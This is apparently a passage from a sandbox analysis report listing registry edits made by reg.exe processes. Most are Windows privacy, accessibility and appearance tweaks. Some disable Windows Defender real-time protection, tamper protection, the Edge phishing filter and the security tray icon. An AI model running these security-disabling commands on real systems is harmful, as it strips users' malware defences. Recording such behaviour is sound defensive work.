        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\StoragePolicy" /v "01" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2836
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\StoragePolicy" /v "2048" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\StoragePolicy" /v "08" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4480
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\StoragePolicy" /v "256" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3196
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\StoragePolicy" /v "32" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:880
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Input\Settings" /v "EnableExpressiveInputEmojiMultipleSelection" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3484
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        8⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2984
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        8⤵
        
        PID:4752
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4764
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4268
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2268
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:408
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t REG_BINARY /d "07000000a7c0ae8e3b30d601" /f
        8⤵
        
        PID:864
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\OneDrive\Accounts\Personal" /v "ShareNotificationDisabled" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2616
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\OneDrive\Accounts\Personal" /v "MassDeleteNotificationDisabled" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4168
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsMitigation" /v "UserPreference" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4452
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam" /v "Value" /t REG_SZ /d "Allow" /f
        8⤵
        
        PID:4448
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:3372
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\Microsoft.MicrosoftEdge_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:1992
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\Microsoft.Office.OneNote_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:700
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\Microsoft.SkypeApp_kzf8qxf38zg5c" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:3340
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\Microsoft.Win32WebViewHost_cw5n1h2txyewy" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:2364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\Microsoft.Windows.Photos_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:1652
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\Microsoft.WindowsCamera_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:4464
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:2032
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\Microsoft.WindowsStore_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:4612
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:2452
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged" /v "Value" /t REG_SZ /d "Allow" /f
        8⤵
        
        PID:4316
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone" /v "Value" /t REG_SZ /d "Allow" /f
        8⤵
        
        PID:4496
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.549981C3F5F10_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:1500
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:772
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.MicrosoftEdge_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:3524
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.MixedReality.Portal_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:4240
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.Office.OneNote_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:2516
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.SkypeApp_kzf8qxf38zg5c" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:1096
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.Win32WebViewHost_cw5n1h2txyewy" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:1424
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.Windows.Photos_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:3724
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:732
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.WindowsCamera_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:960
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:3000
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:4468
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.WindowsStore_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:2744
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.XboxApp_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:4832
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:2296
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged" /v "Value" /t REG_SZ /d "Allow" /f
        8⤵
        
        PID:3476
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Speech_OneCore\Settings\VoiceActivation\UserPreferenceForAllApps" /v "AgentActivationEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2284
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Speech_OneCore\Settings\VoiceActivation\UserPreferenceForAllApps" /v "AgentActivationLastUsed" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3980
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings" /v "SafeSearchMode" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2088
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1008
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "DeviceHistoryEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4392
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "ContactVisualization" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2836
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\ScreenMagnifier" /v "RunningState" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\ScreenMagnifier" /v "FollowMouse" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4480
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\ScreenMagnifier" /v "FollowFocus" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3196
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\ScreenMagnifier" /v "FollowCaret" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\ScreenMagnifier" /v "FollowNarrator" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2784
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator\NoRoam" /v "WinEnterLaunchEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2984
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator\NarratorHome" /v "AutoStart" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3720
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator\NarratorHome" /v "MinimizeType" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4652
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d "506" /f
        8⤵
        
        PID:4936
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\ToggleKeys" /v "Flags" /t REG_SZ /d "34" /f
        8⤵
        
        PID:2860
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\Keyboard Response" /v "Flags" /t REG_SZ /d "2" /f
        8⤵
        
        PID:1544
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d "2" /f
        8⤵
        
        PID:544
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility" /v "Sound on Activation" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4528
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility" /v "Warning Sounds" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:540
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator\NoRoam" /v "DuckAudio" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2884
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator" /v "IntonationPause" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2200
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator" /v "ReadHints" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4500
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator" /v "ErrorNotificationType" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4864
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator" /v "PlayAudioCues" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3168
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator" /v "EchoChars" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2808
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator" /v "EchoWords" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4688
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator\NoRoam" /v "EchoToggleKeys" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1516
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator\NoRoam" /v "EchoModifierKeys" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2328
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator" /v "NarratorCursorHighlight" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4536
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Narrator" /v "CoupleNarratorCursorKeyboard" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4420
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Narrator\NoRoam" /v "ScriptingEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2996
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Narrator\NoRoam" /v "OnlineServicesEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1652
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\GameBar" /v "UseNexusForGameBarEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4464
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\Maps" /v "AutoUpdateEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2032
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "DatabaseMigrationCompleted" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4612
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2452
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "LockScreenToastEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4316
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ImmersiveShell" /v "TabletMode" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4496
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ImmersiveShell" /v "SignInMode" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1500
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ImmersiveShell" /v "ConvertibleSlateModePromptPreference" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:772
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAppsVisibleInTabletMode" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:3524
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAutoHideInTabletMode" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4240
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\CDP" /v "CdpSessionUserAuthzPolicy" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2516
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\CDP" /v "NearShareChannelUserAuthzPolicy" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1088
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\CDP" /v "RomeSdkChannelUserAuthzPolicy" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3984
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\HighContrast" /v "Flags" /t REG_SZ /d "4218" /f
        8⤵
        
        PID:732
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\MouseKeys" /v "Flags" /t REG_SZ /d "130" /f
        8⤵
        
        PID:960
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\MouseKeys" /v "MaximumSpeed" /t REG_SZ /d "39" /f
        8⤵
        
        PID:3000
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\MouseKeys" /v "TimeToMaximumSpeed" /t REG_SZ /d "3000" /f
        8⤵
        
        PID:4468
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\SoundSentry" /v "Flags" /t REG_SZ /d "0" /f
        8⤵
        
        PID:2744
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\SoundSentry" /v "FSTextEffect" /t REG_SZ /d "0" /f
        8⤵
        
        PID:4832
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\SoundSentry" /v "TextEffect" /t REG_SZ /d "0" /f
        8⤵
        
        PID:2296
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\SoundSentry" /v "WindowsEffect" /t REG_SZ /d "0" /f
        8⤵
        
        PID:3476
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\SlateLaunch" /v "ATapp" /t REG_SZ /d "" /f
        8⤵
        
        PID:2284
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\SlateLaunch" /v "LaunchAT" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3980
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\Shell\Associations\AppUrlAssociations\*.maps.windows.com\AppXw2ahfj46c0qbns74sb1bad9a5cpw8042\UserChoice" /v "Hash" /t REG_SZ /d "hkPbF+mnwJo=" /f
        8⤵
        
        PID:2088
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\Shell\Associations\AppUrlAssociations\*.maps.windows.com\AppXw2ahfj46c0qbns74sb1bad9a5cpw8042\UserChoice" /v "Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3712
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\Shell\Associations\AppUrlAssociations\maps.windows.com\AppXpmv5ep1jbsan9pzb5ys5a2x5244nckxh\UserChoice" /v "Hash" /t REG_SZ /d "k0yQGnTObnw=" /f
        8⤵
        
        PID:1008
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\Shell\Associations\AppUrlAssociations\maps.windows.com\AppXpmv5ep1jbsan9pzb5ys5a2x5244nckxh\UserChoice" /v "Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2836
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowFullControl" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4480
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "ColorizationColor" /t REG_DWORD /d "3293334088" /f
        8⤵
        
        PID:3196
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "ColorizationAfterglow" /t REG_DWORD /d "3293334088" /f
        8⤵
        
        PID:644
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "ColorizationGlassAttribute" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4116
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d "4282927692" /f
        8⤵
        
        PID:1704
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v "AccentPalette" /t REG_BINARY /d "9B9A9900848381006D6B6A004C4A4800363533002625240019191900107C1000" /f
        8⤵
        
        PID:3300
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v "StartColorMenu" /t REG_DWORD /d "4281546038" /f
        8⤵
        
        PID:788
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v "AccentColorMenu" /t REG_DWORD /d "4282927692" /f
        8⤵
        
        PID:1548
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings" /v "IsDeviceSearchHistoryEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2008
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\GameBar" /v "ShowStartupPanel" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1544
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\GameBar" /v "GamePanelStartupTipIndex" /t REG_DWORD /d "3" /f
        8⤵
        
        PID:544
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\GameBar" /v "AllowAutoGameMode" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4268
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\GameBar" /v "AutoGameModeEnabled" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2268
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\GameBar" /v "UseNexusForGameBarEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:408
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:864
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehaviorMode" /t REG_DWORD /d "2" /f
        8⤵
        
        PID:2616
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehavior" /t REG_DWORD /d "2" /f
        8⤵
        
        PID:4168
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_HonorUserFSEBehaviorMode" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4452
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DXGIHonorFSEWindowsCompatible" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4448
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_EFSEFeatureFlags" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3180
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_DSEBehavior" /t REG_DWORD /d "2" /f
        8⤵
        
        PID:2520
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1864
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\GameDVR" /v "AppCaptureEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2260
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCR\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" /v "System.IsPinnedToNameSpaceTree" /t REG_DWORD /d "0" /f
        8⤵
        Modifies registry class
        
        PID:708
        
        C:\Windows\system32\reg.exe
        
